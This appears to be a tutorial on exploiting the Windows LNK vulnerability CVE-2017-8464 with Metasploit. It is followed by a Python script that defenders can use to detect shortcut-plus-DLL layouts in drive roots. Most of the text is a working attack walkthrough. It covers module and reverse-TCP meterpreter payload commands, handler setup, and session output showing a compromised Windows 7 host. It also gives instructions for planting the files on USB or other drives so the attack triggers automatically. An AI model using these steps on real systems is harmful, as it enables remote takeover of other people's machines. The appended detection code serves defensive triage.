Basic MSF Usage


msf > use exploit/windows/smb/cve_2017_8464_lnk_rce
msf exploit(cve_2017_8464_lnk_rce) > set payload windows/x64/meterpreter/reverse_tcp ---------- note whether the target machine is x64 or x86
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(cve_2017_8464_lnk_rce) > set LHOST 192.168.1.10 ---------- set the connect-back IP
LHOST => 192.168.1.10
msf exploit(cve_2017_8464_lnk_rce) > run
After the module finishes, it generates many shortcut files, each tagged with a drive letter.


msf exploit(cve_2017_8464_lnk_rce) > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
msf exploit(handler) > run
[*] Started reverse TCP handler on 192.168.1.10:4444
[*] Starting the payload handler...
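Once the handler is running, plugging in a USB drive that holds the shortcut for the matching drive letter and the DLL file makes it run automatically and connect back (the trojan is placed in the root directory; the shortcut may need to be clicked manually).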
[*] Meterpreter session 1 opened (192.168.1.10:4444 -> 192.168.1.5:50438) at 2017-08-14 14:57:25 +0800

meterpreter > sysinfo
Computer : HZJ-PC
OS : Windows 7 (Build 7600).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
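The suffix of each link file is its corresponding drive letter. Placing the matching link file and the DLL file in the root directory of that drive triggers the vulnerability automatically and yields an msf session; this is not limited to USB drives.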
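
For defenders, a triage sketch for the artifact layout described above (shortcut files sitting next to a DLL in a volume root), classifying files by content rather than extension. This is an added example, not part of the original post or of Metasploit; the function names, the sample file names and the "shortcut plus DLL" heuristic are assumptions, while the Shell Link header bytes and the PE DLL flag come from the published file formats.

```python
import struct
from pathlib import Path

# Every Shell Link (.lnk) starts with HeaderSize 0x4C + the LinkCLSID
# 00021401-0000-0000-C000-000000000046 (20 bytes total).
LNK_MAGIC = bytes.fromhex("4c0000000114020000000000c000000000000046")
IMAGE_FILE_DLL = 0x2000  # COFF Characteristics bit set on DLL images

def is_shell_link(data: bytes) -> bool:
    return data[:20] == LNK_MAGIC

def is_pe_dll(data: bytes) -> bool:
    """True if data is a PE image whose COFF header carries the DLL flag."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]  # e_lfanew
    if pe_off + 24 > len(data) or data[pe_off:pe_off + 4] != b"PE\0\0":
        return False
    return bool(struct.unpack_from("<H", data, pe_off + 22)[0] & IMAGE_FILE_DLL)

def triage_volume_root(root) -> dict:
    """Classify files directly in a volume root by content, not extension."""
    links, dlls = [], []
    for entry in sorted(Path(root).iterdir()):
        if not entry.is_file():
            continue
        with entry.open("rb") as fh:
            head = fh.read(4096)  # headers only; a PE header past 4 KiB is missed
        if is_shell_link(head):
            links.append(entry.name)
        elif is_pe_dll(head):
            dlls.append(entry.name)
    # Heuristic (assumption): shortcuts sitting next to a DLL in a root
    # directory match the layout described above and merit manual review.
    return {"links": links, "dlls": dlls, "suspicious": bool(links and dlls)}

def constructed_samples() -> dict:
    """Constructed, inert header-only byte strings (no executable code)."""
    dll = bytearray(0x100)
    dll[:2] = b"MZ"
    struct.pack_into("<I", dll, 0x3C, 0x80)
    dll[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<H", dll, 0x80 + 22, IMAGE_FILE_DLL | 0x0002)
    return {"sample_D.lnk": LNK_MAGIC + bytes(56), "sample.dat": bytes(dll),
            "readme.txt": b"plain text"}

if __name__ == "__main__":
    import sys
    print(triage_volume_root(sys.argv[1]))
```

Run it against a mounted volume's root path; a `suspicious` result is a prompt for manual review, since legitimate media can also carry shortcuts and DLLs.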

